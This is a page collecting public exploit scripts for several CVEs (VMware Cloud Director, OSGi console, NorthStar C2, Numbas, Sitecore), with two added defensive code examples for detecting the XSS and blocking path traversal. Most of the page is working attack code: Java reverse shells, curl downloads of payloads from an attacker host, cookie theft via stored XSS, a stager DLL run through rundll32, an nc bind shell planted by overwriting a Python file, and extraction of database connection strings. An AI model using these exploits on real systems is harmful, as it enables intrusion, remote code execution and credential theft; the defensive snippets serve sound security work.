<pre><code># Exploit Title: [VMware Cloud Director | Bypass identity verification]
# Google Dork: [non]
# Date: [12/06/2023]
# Exploit Author: [Abdualhadi khalifa](https://twitter.com/absholi_ly)
# Version: [10.5]
# CVE : [CVE-2023-34060]
import requests
import paramiko
import subprocess
import socket
import argparse
import threading

# Define a function to check if a port is open
def is_port_open(ip, port):
    # Create a socket object
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    # Set the timeout to 1 second
    s.settimeout(1)
    # Try to connect to the port
    try:
        s.connect((ip, port))
        # The port is open
        return True
    except OSError:
        # The port is closed
        return False
    finally:
        # Close the socket
        s.close()

# Define a function to exploit a vulnerable device
def exploit_device(ip, port, username, password, command):
    # Create a ssh client object
    client = paramiko.SSHClient()
    # Set the policy to accept any host key
    client.set_missing_host_key_policy(paramiko.AutoAddPolicy())
    # Connect to the target using the credentials passed in from the command line
    client.connect(ip, port, username, password, allow_agent=False, look_for_keys=False)
    # Execute the command and get the output
    stdin, stdout, stderr = client.exec_command(command)
    # Print the output
    print(f"The output of the command {command} on the device {ip}:{port} is: {stdout.read().decode()}")
    # Close the ssh connection
    client.close()


# Parse the arguments from the user
parser = argparse.ArgumentParser(description="A Python program to detect and exploit the CVE-2023-34060 vulnerability in VMware Cloud Director")
parser.add_argument("ip", help="The target IP address")
parser.add_argument("-p", "--ports", nargs="+", type=int, default=[22, 5480], help="The target ports to check")
parser.add_argument("-u", "--username", default="root", help="The username for ssh")
parser.add_argument("-w", "--password", default="vmware", help="The password for ssh")
parser.add_argument("-c", "--command", default="hostname", help="The command to execute on the vulnerable devices")
args = parser.parse_args()

# Loop through the ports and check for the vulnerability
for port in args.ports:
    # Check if the port is open
    if is_port_open(args.ip, port):
        # The port is open, send a GET request to the port and check the status code
        response = requests.get(f"http://{args.ip}:{port}")
        if response.status_code == 200:
            # The port is open and vulnerable
            print(f"Port {port} is vulnerable to CVE-2023-34060")
            # Create a thread to exploit the device
            thread = threading.Thread(target=exploit_device, args=(args.ip, port, args.username, args.password, args.command))
            # Start the thread
            thread.start()
        else:
            # The port is open but not vulnerable
            print(f"Port {port} is not vulnerable to CVE-2023-34060")
    else:
        # The port is closed
        print(f"Port {port} is closed")
</code></pre>
<pre><code>#!/usr/bin/python

# Exploit Title: [OSGi v3.7.2 Console RCE]
# Date: [2023-07-28]
# Exploit Author: [Andrzej Olchawa, Milenko Starcik,
# VisionSpace Technologies GmbH]
# Exploit Repository:
# [https://github.com/visionspacetec/offsec-osgi-exploits.git]
# Vendor Homepage: [https://eclipse.dev/equinox]
# Software Link: [https://archive.eclipse.org/equinox/]
# Version: [3.7.2 and before]
# Tested on: [Linux kali 6.3.0-kali1-amd64]
# License: [MIT]
#
# Usage:
#   python exploit.py --help
#
# Examples:
#   python exploit.py --rhost=localhost --rport=1337 --lhost=localhost \
#       --lport=4444
#
#   python exploit.py --rhost=localhost --rport=1337 --payload= \
#       "curl http://192.168.100.100/osgi_test"


"""
This is an exploit that allows to open a reverse shell connection from
the system running OSGi v3.7.2 and earlier.
"""
import argparse
import base64
import socket


def parse():
    """
    This function is used to parse and return command-line arguments.
    """

    parser = argparse.ArgumentParser(
        prog="OSGi-3.7.2-console-RCE",
        description="This tool will let you open a reverse shell from the "
                    "system that is running OSGi with the '-console' "
                    "option in version 3.7.2 (or before).",
        epilog="Happy Hacking! :)",
    )

    parser.add_argument("--rhost", dest="rhost",
                        help="remote host", type=str, required=True)
    parser.add_argument("--rport", dest="rport",
                        help="remote port", type=int, required=True)
    parser.add_argument("--lhost", dest="lhost",
                        help="local host", type=str, required=False)
    parser.add_argument("--lport", dest="lport",
                        help="local port", type=int, required=False)
    parser.add_argument("--payload", dest="custom_payload",
                        help="custom payload", type=str, required=False)
    parser.add_argument("--version", action="version",
                        version="%(prog)s 0.1.0")

    args = parser.parse_args()

    if args.custom_payload and (args.lhost or args.lport):
        parser.error(
            "either --payload or both --lhost and --lport are required.")

    return args


def generate_payload(lhost, lport, custom_payload):
    """
    This function generates the whole payload ready for the delivery.
    """

    payload = ""

    if custom_payload:
        payload = custom_payload

        print("(*) Using custom payload.")
    elif lhost and lport:
        payload = \
            "echo 'import java.io.IOException;import java.io.InputStream;" \
            "import java.io.OutputStream;import java.net.Socket;class Rev" \
            "Shell {public static void main(String[] args) throws Excepti" \
            "on { String host=\"%s\";int port=%s;String cmd=\"sh\";Proces" \
            "s p=new ProcessBuilder(cmd).redirectErrorStream(true).start(" \
            ");Socket s=new Socket(host,port);InputStream pi=p.getInputSt" \
            "ream(),pe=p.getErrorStream(), si=s.getInputStream();OutputSt" \
            "ream po=p.getOutputStream(), so=s.getOutputStream();while(!s" \
            ".isClosed()){while(pi.available()>0)so.write(pi.read());whil" \
            "e(pe.available()>0)so.write(pe.read());while(si.available()>" \
            "0)po.write(si.read());so.flush();po.flush();Thread.sleep(50)" \
            ";try {p.exitValue();break;}catch (Exception e){}};p.destroy(" \
            ");s.close();}}' > RevShell.java ; java ./RevShell.java" % (
                lhost, lport)

        print("(+) Using Java reverse shell payload.")

    bash_payload = b"bash -c {echo,%s}|{base64,-d}|{bash,-i}" % (
        base64.b64encode(payload.encode()))

    wrapped_payload = b"fork \"%s\"\n" % (bash_payload)

    return wrapped_payload


def deliver_payload(rhost, rport, payload):
    """
    This function connects to the target host and delivers the payload.
    It returns True if successful; False otherwise.
    """

    print("(*) Sending payload...")

    try:
        sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        sock.connect((rhost, rport))
        sock.send(payload)
        sock.close()
    except socket.error as err:
        print(f"(-) Could not deliver the payload to {rhost}:{rport}!")
        print(err)
        return False

    return True


def main(args):
    """
    Main function.
    """

    payload = generate_payload(args.lhost, args.lport, args.custom_payload)

    success = deliver_payload(args.rhost, args.rport, payload)
    if success:
        print("(+) Done.")
    else:
        print("(-) Finished with errors.")


if __name__ == "__main__":
    main(parse())
</code></pre>
<pre><code>#!/usr/bin/python

# Exploit Title: [OSGi v3.8-3.18 Console RCE]
# Date: [2023-07-28]
# Exploit Author: [Andrzej Olchawa, Milenko Starcik,
# VisionSpace Technologies GmbH]
# Exploit Repository:
# [https://github.com/visionspacetec/offsec-osgi-exploits.git]
# Vendor Homepage: [https://eclipse.dev/equinox]
# Software Link: [https://archive.eclipse.org/equinox/]
# Version: [3.8 - 3.18]
# Tested on: [Linux kali 6.3.0-kali1-amd64]
# License: [MIT]
#
# Usage:
#   python exploit.py --help
#
# Example:
#   python exploit.py --rhost=192.168.0.133 --rport=1337 --lhost=192.168.0.100 \
#       --lport=4444

"""
This is an exploit that allows to open a reverse shell connection from
the system running OSGi v3.8-3.18 and earlier.
"""
import argparse
import socket
import sys
import threading

from functools import partial
from http.server import BaseHTTPRequestHandler, HTTPServer

# Stage 1 of the handshake message
HANDSHAKE_STAGE_1 = \
    b"\xff\xfd\x01\xff\xfd" \
    b"\x03\xff\xfb\x1f\xff" \
    b"\xfa\x1f\x00\x74\x00" \
    b"\x37\xff\xf0\xff\xfb" \
    b"\x18"

# Stage 2 of the handshake message
HANDSHAKE_STAGE_2 = \
    b"\xff\xfa\x18\x00\x58" \
    b"\x54\x45\x52\x4d\x2d" \
    b"\x32\x35\x36\x43\x4f" \
    b"\x4c\x4f\x52\xff\xf0"

# The buffer of this size is enough to handle the telnet handshake
BUFFER_SIZE = 2 * 1024


class HandlerClass(BaseHTTPRequestHandler):
    """
    This class overrides the BaseHTTPRequestHandler. It provides a specific
    functionality used to deliver a payload to the target host.
    """

    _lhost: str
    _lport: int

    def __init__(self, lhost, lport, *args, **kwargs):
        self._lhost = lhost
        self._lport = lport

        super().__init__(*args, **kwargs)

    def _set_response(self):
        self.send_response(200)
        self.send_header("Content-type", "text/html")
        self.end_headers()

    def do_GET(self):  # pylint: disable=C0103
        """
        This method is responsible for the payload delivery.
        """

        print("Delivering the payload...")

        self._set_response()
        self.wfile.write(generate_revshell_payload(
            self._lhost, self._lport).encode('utf-8'))

        raise KeyboardInterrupt

    def log_message(self, format, *args):  # pylint: disable=W0622
        """
        This method redefines a built-in method to suppress
        BaseHTTPRequestHandler log messages.
        """

        return


def generate_revshell_payload(lhost, lport):
    """
    This function generates the Reverse Shell payload that will
    be executed on the target host.
    """

    payload = \
        "import java.io.IOException;import java.io.InputStream;" \
        "import java.io.OutputStream;import java.net.Socket;" \
        "class RevShell {public static void main(String[] args) " \
        "throws Exception { String host=\"%s\";int port=%d;" \
        "String cmd=\"sh\";Process p=new ProcessBuilder(cmd)." \
        "redirectErrorStream(true).start();Socket s=new Socket(host,port);" \
        "InputStream pi=p.getInputStream(),pe=p.getErrorStream(), " \
        "si=s.getInputStream();OutputStream po=p.getOutputStream()," \
        "so=s.getOutputStream();while(!s.isClosed()){while(pi.available()" \
        ">0)so.write(pi.read());while(pe.available()>0)so.write(pe.read());" \
        "while(si.available()>0)po.write(si.read());so.flush();po.flush();" \
        "Thread.sleep(50);try {p.exitValue();break;}catch (Exception e){}};" \
        "p.destroy();s.close();}}\n" % (
            lhost, lport)

    return payload


def run_payload_delivery(lhost, lport):
    """
    This function is responsible for payload delivery.
    """

    print("Setting up the HTTP server for payload delivery...")

    handler_class = partial(HandlerClass, lhost, lport)

    server_address = ('', 80)
    httpd = HTTPServer(server_address, handler_class)

    try:
        print("[+] HTTP server is running.")

        httpd.serve_forever()
    except KeyboardInterrupt:
        print("[+] Payload delivered.")
    except Exception as err:  # pylint: disable=broad-except
        print("[-] Failed payload delivery!")
        print(err)
    finally:
        httpd.server_close()


def generate_stage_1(lhost):
    """
    This function generates the stage 1 of the payload.
    """

    stage_1 = b"fork \"curl http://%s -o ./RevShell.java\"\n" % (
        lhost.encode()
    )

    return stage_1


def generate_stage_2():
    """
    This function generates the stage 2 of the payload.
    """

    stage_2 = b"fork \"java ./RevShell.java\"\n"

    return stage_2


def establish_connection(rhost, rport):
    """
    This function creates a socket and establishes the connection
    to the target host.
    """

    print("[*] Connecting to OSGi Console...")
    sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    sock.connect((rhost, rport))
    print("[+] Connected.")

    return sock


def process_handshake(sock):
    """
    This function processes the handshake with the target host.
    """

    print("[*] Processing the handshake...")
    sock.recv(BUFFER_SIZE)
    sock.send(HANDSHAKE_STAGE_1)
    sock.recv(BUFFER_SIZE)
    sock.send(HANDSHAKE_STAGE_2)
    sock.recv(BUFFER_SIZE)
    sock.recv(BUFFER_SIZE)


def deliver_payload(sock, lhost):
    """
    This function executes the first stage of the exploitation.
    It triggers the payload delivery mechanism to the target host.
    """

    stage_1 = generate_stage_1(lhost)

    print("[*] Triggering the payload delivery...")
    sock.send(stage_1)
    sock.recv(BUFFER_SIZE)
    sock.recv(BUFFER_SIZE)


def execute_payload(sock):
    """
    This function executes the second stage of the exploitation.
    It sends the payload which is responsible for code execution.
    """

    stage_2 = generate_stage_2()

    print("[*] Executing the payload...")
    sock.send(stage_2)
    sock.recv(BUFFER_SIZE)
    sock.recv(BUFFER_SIZE)
    print("[+] Payload executed.")


def exploit(args, thread):
    """
    This function sends the multistaged payload to the target host.
    """

    try:
        sock = establish_connection(args.rhost, args.rport)

        process_handshake(sock)
        deliver_payload(sock, args.lhost)

        # Join the thread running the HTTP server
        # and wait for payload delivery
        thread.join()

        execute_payload(sock)

        sock.close()

        print("[+] Done.")
    except socket.error as err:
        print("[-] Could not connect!")
        print(err)
        sys.exit()


def parse():
    """
    This function is used to parse and return command-line arguments.
    """

    parser = argparse.ArgumentParser(
        prog="OSGi-3.8-console-RCE",
        description="This tool will let you open a reverse shell from the "
                    "system that is running OSGi with the '-console' "
                    "option in versions between 3.8 and 3.18.",
        epilog="Happy Hacking! :)",
    )

    parser.add_argument("--rhost", dest="rhost",
                        help="remote host", type=str, required=True)
    parser.add_argument("--rport", dest="rport",
                        help="remote port", type=int, required=True)
    parser.add_argument("--lhost", dest="lhost",
                        help="local host", type=str, required=False)
    parser.add_argument("--lport", dest="lport",
                        help="local port", type=int, required=False)
    parser.add_argument("--version", action="version",
                        version="%(prog)s 0.1.0")

    return parser.parse_args()


def main(args):
    """
    Main function.
    """

    thread = threading.Thread(
        target=run_payload_delivery, args=(args.lhost, args.lport))
    thread.start()

    exploit(args, thread)


if __name__ == "__main__":
    main(parse())
</code></pre>
<pre><code># Exploit Title: NorthStar C2 agent RCE via stored XSS
# Date: 2024-03-11
# Exploit Author: @_chebuya
# Software Link: https://github.com/EnginDemirbilek/NorthStarC2
# Version: v1.0
# Tested on: Ubuntu 20.04 LTS
# CVE: CVE-2024-28741
# Description: NorthStar C2 applies insufficient sanitization on agent registration routes, allowing an unauthenticated attacker to send multiple malicious agent registration requests to the teamserver to incrementally build a functioning javascript payload in the logs web page. This XSS can be leveraged to execute commands on NorthStar C2 agents
# Blog: https://blog.chebuya.com/posts/discovering-cve-2024-28741-remote-code-execution-on-northstar-c2-agents-via-pre-auth-stored-xss/
from http.server import BaseHTTPRequestHandler, HTTPServer
from bs4 import BeautifulSoup
import requests
import base64
import threading
import time
import os

class Collector(BaseHTTPRequestHandler):
    def do_GET(self):
        cookie = self.path.split("=")[1]
        print("Cookie: " + cookie)
        self.send_response(200)
        self.end_headers()
        self.wfile.write(b"")

        background_thread = threading.Thread(target=steal_agents, args=(cookie,))
        background_thread.start()

        self.server.shutdown()

def agent_execute_command(agent_id, csrf_token, headers, command):
    data = {
        'slave': agent_id,
        'command': command,
        'sid': agent_id,
        'token': csrf_token
    }

    r = requests.post(target_url + '/functions/setCommand.nonfunction.php', headers=headers, data=data)

    while True:
        r = requests.get(target_url + f"/getresponse.php?slave={agent_id}", headers=headers)
        if len(r.text) != 0 or command == "die":
            break

        time.sleep(1)

def steal_agents(cookie):
    headers = {
        "Cookie": f"PHPSESSID={cookie}"
    }
    r = requests.get(target_url + "/clients.php", headers=headers)
    soup = BeautifulSoup(r.text, 'html.parser')
    rows = soup.find_all('tr')

    agent_ids = []
    hostnames = []

    for row in rows:
        cells = row.find_all('td')
        if len(cells) != 9:
            continue

        status = cells[7].text.strip()
        if status != 'Online':
            continue

        agent_ids.append(cells[1].text.strip())
        hostnames.append(cells[5].text.strip())


    script_tags = soup.find_all('script')

    csrf_token = None
    for script_tag in script_tags:
        if 'csrfToken' in script_tag.text:
            csrf_token = script_tag.text.split('"')[1]
            break

    if csrf_token:
        print("CSRF Token:", csrf_token)
    else:
        print("CSRF Token not found")
        return

    for i in range(len(agent_ids)):
        agent_id = agent_ids[i]
        hostname = hostnames[i]
        print(f"Stealing {hostname} ({agent_id})...")

        print("Enabling shell mode")
        agent_execute_command(agent_id, csrf_token, headers, "enablecmd")
        print(f"Running sliver cradle: {cradle_command}")
        agent_execute_command(agent_id, csrf_token, headers, cradle_command)
        print("Disabling shell mode")
        agent_execute_command(agent_id, csrf_token, headers, "disablecmd")
        print("Sending suicide to slave")
        agent_execute_command(agent_id, csrf_token, headers, "die")


    print("Exploit finished, exiting")
    os._exit(0)


def xor_encryption(text, key):
    encrypted_text = ""

    for i in range(len(text)):
        encrypted_text += chr(ord(text[i]) ^ ord(key[i % len(key)]))

    return encrypted_text

def generate_sid(sid):
    encrypted_sid = xor_encryption(sid, "northstar")

    return base64.urlsafe_b64encode(encrypted_sid.encode()).decode()

def exploit(target_url, callback_url):
    target_url = target_url.rstrip("/") + "/login.php"

    protocol = callback_url.split(":")[0] + "://"
    host = callback_url.split("/")[2].split(":")[0]
    h1, h2 = host[:len(host)//2], host[len(host)//2:]

    if callback_url.count(":") == 2:
        port = callback_url.split(":")[2]
    else:
        if protocol == "https://":
            port = "443"
        else:
            port = "80"

    sid_payloads = ["N*/</script><q", "N*/i.src=u/*q", "N*/new Image;/*q", "N*/var i=/*q", "N*/s+h+p+'/'+c;/*q", "N*/var u=/*q", f"N*/'{protocol}';/*q", "N*/var s=/*q", f"N*/':{port}';/*q", "N*/var p=/*q", "N*/a+b;/*q", "N*/var h=/*q", f"N*/'{h2}';/*q", "N*/var b=/*q", f"N*/'{h1}';/*q", "N*/var a=/*q", "N*/d.cookie;/*q", "N*/var c=/*q", "N*/document;/*q", "N*/var d=/*q", "N</td><script>/*q"]
    for sid in sid_payloads:
        print(sid)
        params = {
            'sid': generate_sid(sid)
        }

        requests.get(target_url, params=params, verify=False)

def run(port):
    server_address = ('', int(port))
    httpd = HTTPServer(server_address, Collector)
    print(f'Server running on port {port}')
    httpd.serve_forever()

cradle_command = r"curl http://192.168.1.6:8000/stager.dll > c:\users\public\stager.dll & rundll32 c:\users\public\stager.dll,inject & echo DONE"

callback_host = "192.168.1.6"
callback_port = "8080"

target_url = "http://192.168.1.4:80"
callback_url = f"http://{callback_host}:{callback_port}"

print("Sending malicious agent registrations...")
exploit(target_url, callback_url)
print("Registrations finished, waiting for execution...")
run(callback_port)
</code></pre>
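<p>The description in the NorthStar listing above names the root cause (agent identifiers are written into the logs page without sanitization) and the PoC shows how each <code>sid</code> is XOR-encoded with the key <code>northstar</code> and base64-encoded before registration. The following is an added example written for this page, not code from the PoC author or the NorthStar project, showing the two things a defender needs from that: a detection that decodes <code>sid</code> values out of teamserver access-log lines and flags the ones carrying markup, and the output encoding that stops a registered fragment from becoming part of the page. The log lines are constructed samples, the <code>KEY</code> is the one the PoC uses, and <code>encode_sid</code> only mirrors the PoC's <code>generate_sid</code> so the samples can be built offline.</p>

```python
import base64
import html
import re
from urllib.parse import unquote

# XOR key the PoC above uses in generate_sid (taken from the page, not a guess).
KEY = "northstar"


def xor_text(text, key):
    """Character-wise XOR of a str with a repeating str key (same as the PoC's xor_encryption)."""
    return "".join(chr(ord(ch) ^ ord(key[i % len(key)])) for i, ch in enumerate(text))


def encode_sid(sid):
    """Mirror of the PoC's generate_sid; used here only to build the constructed log lines."""
    return base64.urlsafe_b64encode(xor_text(sid, KEY).encode()).decode()


def decode_sid(encoded):
    """Reverse generate_sid: percent-decode -> urlsafe base64 -> UTF-8 -> XOR.
    Returns None when the value is not valid base64."""
    try:
        raw = base64.urlsafe_b64decode(unquote(encoded)).decode("utf-8", errors="replace")
    except ValueError:  # binascii.Error is a ValueError subclass
        return None
    return xor_text(raw, KEY)


# Markup and script fragments that have no business in an agent identifier.
SUSPICIOUS = re.compile(r"</?[a-z]+|/\*|\*/|document\.|\.cookie", re.IGNORECASE)


def is_suspicious_sid(decoded):
    """True when a decoded sid carries HTML/JS fragments of the kind the PoC registers."""
    return decoded is not None and SUSPICIOUS.search(decoded) is not None


# Constructed sample of teamserver access-log lines (not real traffic). Line 1 is a
# benign registration; lines 2 and 3 carry two fragments from the PoC's sid_payloads.
SAMPLE_LOG = [
    '198.51.100.7 - - [11/Mar/2024:10:00:01 +0000] "GET /login.php?sid=%s HTTP/1.1" 200 312'
    % encode_sid("agent-42"),
    '198.51.100.7 - - [11/Mar/2024:10:00:02 +0000] "GET /login.php?sid=%s HTTP/1.1" 200 312'
    % encode_sid("N</td><script>/*q"),
    '198.51.100.7 - - [11/Mar/2024:10:00:03 +0000] "GET /login.php?sid=%s HTTP/1.1" 200 312'
    % encode_sid("N*/var d=/*q"),
]

LOGIN_SID = re.compile(r'"GET /login\.php\?sid=([A-Za-z0-9_%=-]+)')


def scan_access_log(lines):
    """Return (line_no, decoded_sid) for registrations whose sid decodes to markup."""
    hits = []
    for n, line in enumerate(lines, 1):
        m = LOGIN_SID.search(line)
        if not m:
            continue
        decoded = decode_sid(m.group(1))
        if is_suspicious_sid(decoded):
            hits.append((n, decoded))
    return hits


def render_agent_cell(sid):
    """Render an agent id into the logs table with output encoding applied, so a
    registered '</td><script>' lands in the page as text rather than as markup."""
    return "<td>%s</td>" % html.escape(sid, quote=True)


if __name__ == "__main__":
    for line_no, sid in scan_access_log(SAMPLE_LOG):
        print(f"line {line_no}: suspicious sid {sid!r} -> rendered safely as {render_agent_cell(sid)}")
```

<p>Because the PoC splits its script across many registrations, no single fragment looks like a complete payload; the detection therefore keys on markup characters and comment delimiters rather than on a whole <code>&lt;script&gt;</code> element, and escaping at render time neutralises the fragments regardless of how they were split.</p>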
<pre><code># Exploit Title: Numbas < v7.3 - Remote Code Execution
# Google Dork: N/A
# Date: March 7th, 2024
# Exploit Author: Matheus Boschetti
# Vendor Homepage: https://www.numbas.org.uk/
# Software Link: https://github.com/numbas/Numbas
# Version: 7.2 and below
# Tested on: Linux
# CVE: CVE-2024-27612

import sys, requests, re, argparse, subprocess, time
from bs4 import BeautifulSoup

s = requests.session()

def getCSRF(target):
    url = f"http://{target}/"
    req = s.get(url)
    soup = BeautifulSoup(req.text, 'html.parser')
    csrfmiddlewaretoken = soup.find('input', attrs={'name': 'csrfmiddlewaretoken'})['value']
    return csrfmiddlewaretoken

def createTheme(target):
    # Format request
    csrfmiddlewaretoken = getCSRF(target)
    theme = 'ExampleTheme'
    boundary = '----WebKitFormBoundaryKUMXsLP31HzARUV1'
    data = (
        f'--{boundary}\r\n'
        'Content-Disposition: form-data; name="csrfmiddlewaretoken"\r\n'
        '\r\n'
        f'{csrfmiddlewaretoken}\r\n'
        f'--{boundary}\r\n'
        'Content-Disposition: form-data; name="name"\r\n'
        '\r\n'
        f'{theme}\r\n'
        f'--{boundary}--\r\n'
    )
    headers = {'Content-Type': f'multipart/form-data; boundary={boundary}',
               'User-Agent': 'Mozilla/5.0',
               'Accept': '*/*',
               'Connection': 'close'}

    # Create theme and return its ID
    req = s.post(f"http://{target}/theme/new/", headers=headers, data=data)
    redir = req.url
    split = redir.split('/')
    id = split[4]
    print(f"\t[i] Theme created with ID {id}")
    return id

def login(target, user, passwd):
    print("\n[i] Attempting to login...")

    csrfmiddlewaretoken = getCSRF(target)
    data = {'csrfmiddlewaretoken': csrfmiddlewaretoken,
            'username': user,
            'password': passwd,
            'next': '/'}

    # Login
    login = s.post(f"http://{target}/login/", data=data, allow_redirects=True)
    res = login.text
    if("Logged in as" not in res):
        print("\n\n[!] Login failed!")
        sys.exit(-1)

    # Check if logged and fetch ID
    usermatch = re.search(r'Logged in as <strong>(.*?)</strong>', res)
    if usermatch:
        user = usermatch.group(1)
    idmatch = re.search(r'<a href="/accounts/profile/(.*?)/"><span class="glyphicon glyphicon-user">', res)
    if idmatch:
        id = idmatch.group(1)
    print(f"\t[+] Logged in as \"{user}\" with ID {id}")

def checkVuln(url):
    print("[i] Checking if target is vulnerable...")

    # Attempt to read files
    themeID = createTheme(url)
    target = f"http://{url}/themes/{themeID}/edit_source?filename=../../../../../../../../../.."
    hname = s.get(f"{target}/etc/hostname")
    ver = s.get(f"{target}/etc/issue")
    hnamesoup = BeautifulSoup(hname.text, 'html.parser')
    versoup = BeautifulSoup(ver.text, 'html.parser')
    hostname = hnamesoup.find('textarea').get_text().strip()
    version = versoup.find('textarea').get_text().strip()
    if len(hostname) < 1:
        print("\n\n[!] Something went wrong - target might not be vulnerable.")
        sys.exit(-1)
    print(f"\n[+] Target \"{hostname}\" is vulnerable!")
    print(f"\t[i] Running: \"{version}\"")

    # Cleanup - delete theme
    print(f"\t\t[i] Cleanup: deleting theme {themeID}...")
    target = f"http://{url}/themes/{themeID}/delete"
    csrfmiddlewaretoken = getCSRF(url)
    data = {'csrfmiddlewaretoken':csrfmiddlewaretoken}
    s.post(target, data=data)


def replaceInit(target):
    # Overwrite __init__.py with arbitrary code
    rport = '8443'
    payload = f"import subprocess;subprocess.Popen(['nc','-lnvp','{rport}','-e','/bin/bash'])"
    csrfmiddlewaretoken = getCSRF(target)
    filename = '../../../../numbas_editor/numbas/__init__.py'
    themeID = createTheme(target)
    data = {'csrfmiddlewaretoken': csrfmiddlewaretoken,
            'source': payload,
            'filename': filename}

    print("[i] Delivering payload...")
    # Retry 5 times in case something goes wrong...
    for attempt in range(5):
        try:
            s.post(f"http://{target}/themes/{themeID}/edit_source", data=data, timeout=10)
        except Exception as e:
            pass

    # Establish connection to bind shell
    time.sleep(2)
    print(f"\t[+] Payload delivered, establishing connection...\n")
    if ":" in target:
        split = target.split(":")
        ip = split[0]
    else:
        ip = str(target)
    subprocess.Popen(["nc", "-n", ip, rport])
    while True:
        pass


def main():
    parser = argparse.ArgumentParser()
    if len(sys.argv) <= 1:
        print("\n[!] No option provided!")
        print("\t- check: Passively check if the target is vulnerable by attempting to read files from disk\n\t- exploit: Attempt to actively exploit the target\n")
        print(f"[i] Usage: python3 {sys.argv[0]} <option> --target 172.16.1.5:80 --user example --passwd qwerty")
        sys.exit(-1)

    group = parser.add_mutually_exclusive_group(required=True)
    group.add_argument('action', nargs='?', choices=['check', 'exploit'], help='Action to perform: check or exploit')
    parser.add_argument('--target', help='Target IP:PORT')
    parser.add_argument('--user', help='Username to authenticate')
    parser.add_argument('--passwd', help='Password to authenticate')
    args = parser.parse_args()
    action = args.action
    target = args.target
    user = args.user
    passwd = args.passwd

    print("\n\t\t-==[ CVE-2024-27612: Numbas Remote Code Execution (RCE) ]==-")

    if action == 'check':
        login(target, user, passwd)
        checkVuln(target)
    elif action == 'exploit':
        login(target, user, passwd)
        replaceInit(target)
    else:
        sys.exit(-1)


if __name__ == "__main__":
    main()
</code></pre>
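<p>Both halves of the Numbas PoC above hinge on one parameter: <code>edit_source?filename=</code> is joined onto a theme directory and then read (<code>checkVuln</code>) or written (<code>replaceInit</code>) without checking that the result still lies inside that directory. The following is an added example written for this page, not code from the PoC author or the Numbas project, showing the containment check that closes that class of bug: resolve the joined path and require it to be relative to the theme root. <code>THEME_ROOT</code> is a hypothetical install path, the request URLs are constructed samples that reuse the two traversal strings from the PoC, and the same check applies to any other request value that is turned into a filesystem path.</p>

```python
import os
from pathlib import Path
from urllib.parse import parse_qs, urlsplit


def resolve_theme_file(theme_root, filename):
    """
    Resolve a user-supplied filename inside theme_root and refuse any value
    that escapes it. Returns the absolute Path to serve, or None when rejected.
    """
    if not filename or os.path.isabs(filename):
        # An absolute second operand makes Path.__truediv__ discard theme_root entirely,
        # so absolute names are rejected before any joining happens.
        return None
    root = Path(theme_root).resolve()
    # resolve() collapses every '..' (and follows symlinks), so a traversal string
    # becomes a path outside root rather than a path that merely contains '..'.
    candidate = (root / filename).resolve()
    try:
        # Component-wise comparison: a sibling such as '.../42x/foo' is rejected too,
        # which a plain string-prefix check would let through.
        candidate.relative_to(root)
    except ValueError:
        return None
    return candidate


def audit_edit_source_url(theme_root, url):
    """
    Pull filename= out of an edit_source request URL (the parameter the PoC
    abuses) and report whether the containment check would let it through.
    """
    params = parse_qs(urlsplit(url).query)
    filename = params.get("filename", [""])[0]
    return resolve_theme_file(theme_root, filename) is not None


# Hypothetical theme directory for one theme; not a path taken from the project.
THEME_ROOT = "/srv/numbas_editor/media/themes/42"

# Constructed request URLs: one legitimate theme file, then the read from checkVuln
# and the write target from replaceInit, exactly as the PoC sends them.
SAMPLE_REQUESTS = [
    "http://numbas.example/themes/42/edit_source?filename=templates/question.html",
    "http://numbas.example/themes/42/edit_source?filename=../../../../../../../../../../etc/hostname",
    "http://numbas.example/themes/42/edit_source?filename=../../../../numbas_editor/numbas/__init__.py",
]


def audit_all(theme_root=THEME_ROOT, urls=SAMPLE_REQUESTS):
    """Map each request URL to True (would be served) or False (rejected)."""
    return {u: audit_edit_source_url(theme_root, u) for u in urls}


if __name__ == "__main__":
    for url, allowed in audit_all().items():
        print("ALLOW " if allowed else "REJECT", url)
```

<p>The check is deliberately done on the resolved path rather than by stripping <code>..</code> from the input: normalising the string leaves encoded or repeated variants to argue about, whereas <code>relative_to</code> on the resolved result answers the only question that matters, which is where the file actually lands.</p>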
<pre><code>#!/usr/bin/env python3
#
# Exploit Title: Sitecore - Remote Code Execution v8.2
# Exploit Author: abhishek morla
# Google Dork: N/A
# Date: 2024-01-08
# Vendor Homepage: https://www.sitecore.com/
# Software Link: https://dev.sitecore.net/
# Version: 10.3
# Tested on: Windows 64-bit / Mozilla Firefox
# CVE : CVE-2023-35813
# The vulnerability impacts all Experience Platform topologies (XM, XP, XC) from 9.0 Initial Release to 10.3 Initial Release; 8.2 is also impacted
# Blog : https://medium.com/@abhishekmorla/uncovering-cve-2023-35813-retrieving-core-connection-strings-in-sitecore-5502148fce09
# Video POC : https://youtu.be/vWKl9wgdTB0

import argparse
import requests
from urllib.parse import quote
from rich.console import Console

console = Console()
def initial_test(hostname):
    # Initial payload to test vulnerability
    test_payload = '''
    <%@Register
        TagPrefix = 'x'
        Namespace = 'System.Runtime.Remoting.Services'
        Assembly = 'System.Runtime.Remoting, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089'
    %>
    <x:RemotingService runat='server'
        Context-Response-ContentType='TestVulnerability'
    />
    '''
    encoded_payload = quote(test_payload)

    url = f"https://{hostname}/sitecore_xaml.ashx/-/xaml/Sitecore.Xaml.Tutorials.Styles.Index"
    headers = {"Content-Type": "application/x-www-form-urlencoded"}
    data = "__ISEVENT=1&__SOURCE=&__PARAMETERS=ParseControl(\"{}\")".format(encoded_payload)

    response = requests.post(url, headers=headers, data=data, verify=False)

    # Check for the test string in the Content-Type of the response
    return 'TestVulnerability' in response.headers.get('Content-Type', '')

def get_payload(choice):
    # Payload templates for different options
    payloads = {
        '1': "<%$ ConnectionStrings:core %>",
        '2': "<%$ ConnectionStrings:master %>",
        '3': "<%$ ConnectionStrings:web %>"
    }

    base_payload = '''
    <%@Register
        TagPrefix = 'x'
        Namespace = 'System.Runtime.Remoting.Services'
        Assembly = 'System.Runtime.Remoting, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089'
    %>
    <x:RemotingService runat='server'
        Context-Response-ContentType='{}'
    />
    '''

    return base_payload.format(payloads.get(choice, "Invalid"))

def main(hostname):
    if initial_test(hostname):
        print("Exploiting, Please wait...")
        console.print("[bold green]The target appears to be vulnerable. Proceed with payload selection.[/bold green]")
        print("Select the payload to use:")
        print("1: Core connection strings")
        print("2: Master connection strings")
        print("3: Web connection strings")
